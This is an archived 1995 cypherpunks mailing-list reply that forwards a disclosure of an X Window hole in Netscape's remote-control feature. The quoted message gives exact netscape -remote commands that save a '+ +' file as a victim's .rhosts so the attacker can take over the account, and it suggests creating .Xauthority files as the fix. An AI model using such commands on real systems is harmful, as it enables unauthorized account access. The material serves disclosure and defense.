[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Netscape hole without .Xauthority (fwd)

To: [email protected] (Jyri Kaljundi)
Subject: Re: Netscape hole without .Xauthority (fwd)
From: sameer <[email protected]>
Date: Fri, 29 Sep 1995 09:44:45 -0700 (PDT)
Cc: [email protected]
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo> from "Jyri Kaljundi" at Sep 29, 95 03:59:07 pm
Pgp-Strong-Print: 3C AE E4 00 C2 6A 81 FF 49 4E EE 0C CD CD 1D 80
Sender: [email protected]

	That's called an X hole, not a netscape hole.

> 
> 
> Haven't seen this on the cypherpunks yet, sorry if this has been here=20
> already.=20
> 
> Juri
> 
> <o       J=FCri Kaljundi          e-mail: [email protected]         o<
>  >o                             tel: +372 6308994            o>
> <o       DigiTurg               http://www.digit.ee/        o<
> 
> ---------- Forwarded message ----------
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.=20
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> 
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> 
> - make a text file containing only "+ +" accessible (as file, as URL, or
>   whatever you like) to the target Netscape client. This is quite easy, eit=
> her
>   if you have a personal WWW page (http://... URL) or an account on the
>   target machine (file://... URL), or even by uploading it to an anon FTP
> 
> - set your DISPLAY environment variable to the target display
> 
> - run the following set of commands :
> 
>   netscape -noraise -remote "openURL(<put-your-URL-here>)"
>   netscape -noraise -remote "saveAs(.rhosts)"
>   netscape -noraise -remote back
> 
> In the second command, the path should be specified whenever possible=20
> (~ is not accepted).
> 
> If the target user does not already have a .rhosts and is not looking at th=
> at
> precise moment, then the chances are it worked !
> 
> Solution to the problem : every user concerned should either create a=20
> Xauthority file, or stop using Netscape.
> 
> =09MXK
> 
> 
> PS: WHY do they bother with PGP and RSA security when they keep such holes =
> ????
> 
> +------------------------------------+---------------------------------+
> |  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
> |  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
> |  75005 PARIS FRANCE                | 75005 PARIS                     |
> |  email: [email protected]      | FRANCE                          |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50.     |
> | After registering you will receive a fully functional .sig and all   |
> | updates for free.                                                    |
> +----------------------------------------------------------------------+
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			[email protected]

References:
- Netscape hole without .Xauthority (fwd)
  - From: Jyri Kaljundi <[email protected]>

Prev by Date: Re: Netscape "random" number seed generator code available
Next by Date: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Prev by thread: Re: Netscape hole without .Xauthority (fwd)
Next by thread: Re: Netscape hole without .Xauthority (fwd)
Index(es):
- Date
- Thread